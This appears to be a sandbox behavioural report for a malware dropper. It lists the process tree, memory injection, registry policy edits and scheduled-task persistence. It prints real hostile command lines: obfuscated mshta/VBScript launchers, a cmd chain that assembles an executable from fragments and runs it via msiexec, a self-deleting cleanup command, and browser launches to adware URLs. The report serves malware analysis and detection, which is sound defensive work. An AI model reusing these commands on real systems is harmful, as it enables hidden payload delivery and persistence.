1012 wrote to memory of 4388 1012 Fri051e1e7444.exe G51K2QNgA1moFPDcsqFsEuBz.exe PID 1012 wrote to memory of 4388 1012 Fri051e1e7444.exe G51K2QNgA1moFPDcsqFsEuBz.exe PID 1012 wrote to memory of 1320 1012 Fri051e1e7444.exe far1gFrhm6HTCSwt7AdHUaXK.exe PID 1012 wrote to memory of 1320 1012 Fri051e1e7444.exe far1gFrhm6HTCSwt7AdHUaXK.exe PID 1012 wrote to memory of 1320 1012 Fri051e1e7444.exe far1gFrhm6HTCSwt7AdHUaXK.exe PID 1012 wrote to memory of 2348 1012 Fri051e1e7444.exe XQXdH_5JuxvMmlvSZF2UGNpF.exe PID 1012 wrote to memory of 2348 1012 Fri051e1e7444.exe XQXdH_5JuxvMmlvSZF2UGNpF.exe PID 1976 wrote to memory of 3324 1976 KtMfKMTyGhGITYlVicMT552T.exe KtMfKMTyGhGITYlVicMT552T.exe PID 1976 wrote to memory of 3324 1976 KtMfKMTyGhGITYlVicMT552T.exe KtMfKMTyGhGITYlVicMT552T.exe PID 1976 wrote to memory of 3324 1976 KtMfKMTyGhGITYlVicMT552T.exe KtMfKMTyGhGITYlVicMT552T.exe PID 1012 wrote to memory of 4276 1012 Fri051e1e7444.exe _v1u23KhcxVvki0UuinAXhKa.exe PID 1012 wrote to memory of 4276 1012 Fri051e1e7444.exe _v1u23KhcxVvki0UuinAXhKa.exe PID 1012 wrote to memory of 4276 1012 Fri051e1e7444.exe _v1u23KhcxVvki0UuinAXhKa.exe PID 1976 wrote to memory of 3324 1976 KtMfKMTyGhGITYlVicMT552T.exe KtMfKMTyGhGITYlVicMT552T.exe PID 1976 wrote to memory of 3324 1976 KtMfKMTyGhGITYlVicMT552T.exe KtMfKMTyGhGITYlVicMT552T.exe PID 1976 wrote to memory of 3324 1976 KtMfKMTyGhGITYlVicMT552T.exe KtMfKMTyGhGITYlVicMT552T.exe PID 1976 wrote to memory of 3324 1976 KtMfKMTyGhGITYlVicMT552T.exe KtMfKMTyGhGITYlVicMT552T.exe PID 1976 wrote to memory of 3324 1976 KtMfKMTyGhGITYlVicMT552T.exe KtMfKMTyGhGITYlVicMT552T.exe PID 1976 wrote to memory of 3324 1976 KtMfKMTyGhGITYlVicMT552T.exe KtMfKMTyGhGITYlVicMT552T.exe -
System policy modification 1 TTPs 4 IoCs
Processes:
setup.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Ext setup.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Ext\CLSID\ setup.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Ext\CLSID setup.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Ext\CLSID\{1FD49718-1D00-4B19-AF5F-070AF6D5D54C} = "1" setup.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\Fri051e1e7444.exe"C:\Users\Admin\AppData\Local\Temp\Fri051e1e7444.exe"1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\Pictures\Adobe Films\qpVL2ZesZ5Dciz3WyY2qTUz4.exe"C:\Users\Admin\Pictures\Adobe Films\qpVL2ZesZ5Dciz3WyY2qTUz4.exe"2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\Pictures\Adobe Films\dcXxD_mTLuOWLK7yvm0uWiKh.exe"C:\Users\Admin\Pictures\Adobe Films\dcXxD_mTLuOWLK7yvm0uWiKh.exe"2⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\build.exe"C:\Users\Admin\AppData\Local\Temp\build.exe"3⤵
- Executes dropped EXE
- Checks processor information in registry
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im build.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\build.exe" & del C:\ProgramData\*.dll & exit4⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im build.exe /f5⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\timeout.exetimeout /t 65⤵
- Delays execution with timeout.exe
-
C:\Users\Admin\Pictures\Adobe Films\KtMfKMTyGhGITYlVicMT552T.exe"C:\Users\Admin\Pictures\Adobe Films\KtMfKMTyGhGITYlVicMT552T.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\Pictures\Adobe Films\KtMfKMTyGhGITYlVicMT552T.exe"C:\Users\Admin\Pictures\Adobe Films\KtMfKMTyGhGITYlVicMT552T.exe"3⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3324 -s 2084⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\Pictures\Adobe Films\4svaL_6jcYHnI8EWxQv_ARQo.exe"C:\Users\Admin\Pictures\Adobe Films\4svaL_6jcYHnI8EWxQv_ARQo.exe"2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Identifies Wine through registry keys
- Adds Run key to start application
- Drops file in System32 directory
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
-
C:\Users\Admin\Pictures\Adobe Films\4svaL_6jcYHnI8EWxQv_ARQo.exe"C:\Users\Admin\Pictures\Adobe Films\4svaL_6jcYHnI8EWxQv_ARQo.exe"3⤵
- Checks BIOS information in registry
- Identifies Wine through registry keys
- Adds Run key to start application
- Drops file in System32 directory
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\DmjYaTcFdw.bat"4⤵
-
C:\Windows\SysWOW64\w32tm.exew32tm /stripchart /computer:localhost /period:5 /dataonly /samples:25⤵
-
C:\Windows\system32\w32tm.exew32tm /stripchart /computer:localhost /period:5 /dataonly /samples:26⤵
-
C:\Users\Admin\Pictures\Adobe Films\4svaL_6jcYHnI8EWxQv_ARQo.exe"C:\Users\Admin\Pictures\Adobe Films\4svaL_6jcYHnI8EWxQv_ARQo.exe"5⤵
- Checks BIOS information in registry
- Identifies Wine through registry keys
- Adds Run key to start application
- Drops file in System32 directory
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\UtehC4VHgM.bat"6⤵
-
C:\Windows\SysWOW64\w32tm.exew32tm /stripchart /computer:localhost /period:5 /dataonly /samples:27⤵
-
C:\Windows\system32\w32tm.exew32tm /stripchart /computer:localhost /period:5 /dataonly /samples:28⤵
-
C:\Recovery\WindowsRE\msedge.exe"C:\Recovery\WindowsRE\msedge.exe"7⤵
- Checks BIOS information in registry
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: GetForegroundWindowSpam
-
C:\Users\Admin\Pictures\Adobe Films\ZPIklAxPB6jR82sYubVd1wws.exe"C:\Users\Admin\Pictures\Adobe Films\ZPIklAxPB6jR82sYubVd1wws.exe"2⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1888 -s 2523⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\Pictures\Adobe Films\D9dd_RETOj4JIUabpjwAT2fp.exe"C:\Users\Admin\Pictures\Adobe Films\D9dd_RETOj4JIUabpjwAT2fp.exe"2⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST3⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST3⤵
- Creates scheduled task(s)
-
C:\Users\Admin\Documents\G3yhd3bJJbP04w8gmz860v7W.exe"C:\Users\Admin\Documents\G3yhd3bJJbP04w8gmz860v7W.exe"3⤵
- Executes dropped EXE
-
C:\Users\Admin\Pictures\Adobe Films\XNzIcv2Kkl8zVywu80iKVE8U.exe"C:\Users\Admin\Pictures\Adobe Films\XNzIcv2Kkl8zVywu80iKVE8U.exe"4⤵
- Executes dropped EXE
-
C:\Users\Admin\Pictures\Adobe Films\KSYXHNTmRqvS6Y0tsYgqtLKS.exe"C:\Users\Admin\Pictures\Adobe Films\KSYXHNTmRqvS6Y0tsYgqtLKS.exe"4⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ).Run ( "cmd /R cOpY /Y ""C:\Users\Admin\Pictures\Adobe Films\KSYXHNTmRqvS6Y0tsYgqtLKS.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If """" == """" for %M in (""C:\Users\Admin\Pictures\Adobe Films\KSYXHNTmRqvS6Y0tsYgqtLKS.exe"" ) do taskkill -f -iM ""%~NxM"" ", 0 , truE) )5⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\Pictures\Adobe Films\KSYXHNTmRqvS6Y0tsYgqtLKS.exe" ..\kPBhgOaGQk.exe&&sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If ""=="" for %M in ("C:\Users\Admin\Pictures\Adobe Films\KSYXHNTmRqvS6Y0tsYgqtLKS.exe" ) do taskkill -f -iM "%~NxM"6⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill -f -iM "KSYXHNTmRqvS6Y0tsYgqtLKS.exe"7⤵
- Kills process with taskkill
-
C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi7⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ).Run ( "cmd /R cOpY /Y ""C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If ""/PLQtzfgO0m8dRv4iYALOqi "" == """" for %M in (""C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe"" ) do taskkill -f -iM ""%~NxM"" ", 0 , truE) )8⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe" ..\kPBhgOaGQk.exe&&sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If "/PLQtzfgO0m8dRv4iYALOqi "=="" for %M in ("C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe" ) do taskkill -f -iM "%~NxM"9⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbScRIpt:CLosE ( cReAteobjEcT("wscRiPt.SheLl" ). RUn ("C:\Windows\system32\cmd.exe /R EcHO UwC:\Users\Admin\AppData\Local\TempNnML~>TRMBiI66.CU & EcHo | Set /P = ""MZ"" > hKS2IU.1Q & COPY /b /Y hKs2Iu.1Q + 9BU~.W + MyBa.V + 1W8lBDVH.AOu +WCWfZ1TN.MJ+ WCBG6.QA + tRMBII66.CU ..\LXQ2G.WC & Del /q *& starT msiexec -Y ..\lXQ2g.WC " , 0, tRUE) )8⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /R EcHO UwC:\Users\Admin\AppData\Local\TempNnML~>TRMBiI66.CU & EcHo | Set /P = "MZ" >hKS2IU.1Q & COPY /b /Y hKs2Iu.1Q + 9BU~.W + MyBa.V +1W8lBDVH.AOu +WCWfZ1TN.MJ+ WCBG6.QA + tRMBII66.CU ..\LXQ2G.WC& Del /q *&starT msiexec -Y ..\lXQ2g.WC9⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" EcHo "10⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" Set /P = "MZ" 1>hKS2IU.1Q"10⤵
-
C:\Windows\SysWOW64\msiexec.exemsiexec -Y ..\lXQ2g.WC10⤵
- Loads dropped DLL
-
C:\Users\Admin\Pictures\Adobe Films\rrC17Jxann9wXbNQOrrI4sZa.exe"C:\Users\Admin\Pictures\Adobe Films\rrC17Jxann9wXbNQOrrI4sZa.exe"4⤵
- Executes dropped EXE
-
C:\Users\Admin\Pictures\Adobe Films\YkJJP9hUDzrPj8CaQUtFkm4K.exe"C:\Users\Admin\Pictures\Adobe Films\YkJJP9hUDzrPj8CaQUtFkm4K.exe" /mixtwo4⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1656 -s 2525⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\Pictures\Adobe Films\6VJcPvgbLTEnL3gyVOmcMDK4.exe"C:\Users\Admin\Pictures\Adobe Films\6VJcPvgbLTEnL3gyVOmcMDK4.exe"4⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3004 -s 2485⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\Pictures\Adobe Films\VgPCyYrKaciomQNCsBVgxTDM.exe"C:\Users\Admin\Pictures\Adobe Films\VgPCyYrKaciomQNCsBVgxTDM.exe"4⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\is-A3J6H.tmp\VgPCyYrKaciomQNCsBVgxTDM.tmp"C:\Users\Admin\AppData\Local\Temp\is-A3J6H.tmp\VgPCyYrKaciomQNCsBVgxTDM.tmp" /SL5="$5023E,506127,422400,C:\Users\Admin\Pictures\Adobe Films\VgPCyYrKaciomQNCsBVgxTDM.exe"5⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\is-Q7J33.tmp\DYbALA.exe"C:\Users\Admin\AppData\Local\Temp\is-Q7J33.tmp\DYbALA.exe" /S /UID=27096⤵
-
C:\Program Files\Windows NT\FMIXWSNWAR\foldershare.exe"C:\Program Files\Windows NT\FMIXWSNWAR\foldershare.exe" /VERYSILENT7⤵
- Suspicious behavior: GetForegroundWindowSpam
-
C:\Users\Admin\AppData\Local\Temp\e8-44431-176-86cbf-919586635e4d8\Vumobazhaxi.exe"C:\Users\Admin\AppData\Local\Temp\e8-44431-176-86cbf-919586635e4d8\Vumobazhaxi.exe"7⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.profitabletrustednetwork.com/e2q8zu9hu?key=a971bbe4a40a7216a1a87d8f455f71e68⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff8efd346f8,0x7ff8efd34708,0x7ff8efd347189⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2072,17519730187947641337,9118907866499339036,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2088 /prefetch:29⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2072,17519730187947641337,9118907866499339036,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2220 /prefetch:39⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.profitabletrustednetwork.com/b1fsmdd9m?key=7e872dab99d78bffc4aa0c1e6b062dad8⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xa0,0x10c,0x7ff8efd346f8,0x7ff8efd34708,0x7ff8efd347189⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?zoneid=18514838⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x110,0x114,0x118,0xec,0x11c,0x7ff8efd346f8,0x7ff8efd34708,0x7ff8efd347189⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?zoneid=18515138⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff8efd346f8,0x7ff8efd34708,0x7ff8efd347189⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://www.directdexchange.com/jump/next.php?r=20872158⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff8efd346f8,0x7ff8efd34708,0x7ff8efd347189⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.directdexchange.com/jump/next.php?r=42631198⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff8efd346f8,0x7ff8efd34708,0x7ff8efd347189⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?id=12942318⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x104,0x108,0x10c,0xe0,0x110,0x7ff8efd346f8,0x7ff8efd34708,0x7ff8efd347189⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?zoneid=1492888&var=38⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff8efd346f8,0x7ff8efd34708,0x7ff8efd347189⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?zoneid=1343177&var=38⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff8efd346f8,0x7ff8efd34708,0x7ff8efd347189⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?id=13396808⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x104,0x108,0x10c,0xe0,0x110,0x7ff8efd346f8,0x7ff8efd34708,0x7ff8efd347189⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?zoneid=1620783&var=38⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff8efd346f8,0x7ff8efd34708,0x7ff8efd347189⤵
-
C:\Users\Admin\AppData\Local\Temp\66-c5ed9-ad9-af585-ceced0e58f52f\Quvyturyha.exe"C:\Users\Admin\AppData\Local\Temp\66-c5ed9-ad9-af585-ceced0e58f52f\Quvyturyha.exe"7⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\nvx1agmo.r0j\GcleanerEU.exe /eufive & exit8⤵
-
C:\Users\Admin\AppData\Local\Temp\nvx1agmo.r0j\GcleanerEU.exeC:\Users\Admin\AppData\Local\Temp\nvx1agmo.r0j\GcleanerEU.exe /eufive9⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 13216 -s 24810⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\q5lxroat.kpm\installer.exe /qn CAMPAIGN="654" & exit8⤵
-
C:\Users\Admin\AppData\Local\Temp\q5lxroat.kpm\installer.exeC:\Users\Admin\AppData\Local\Temp\q5lxroat.kpm\installer.exe /qn CAMPAIGN="654"9⤵
- Loads dropped DLL
- Enumerates connected drives
- Modifies system certificate store
- Suspicious use of FindShellTrayWindow
-
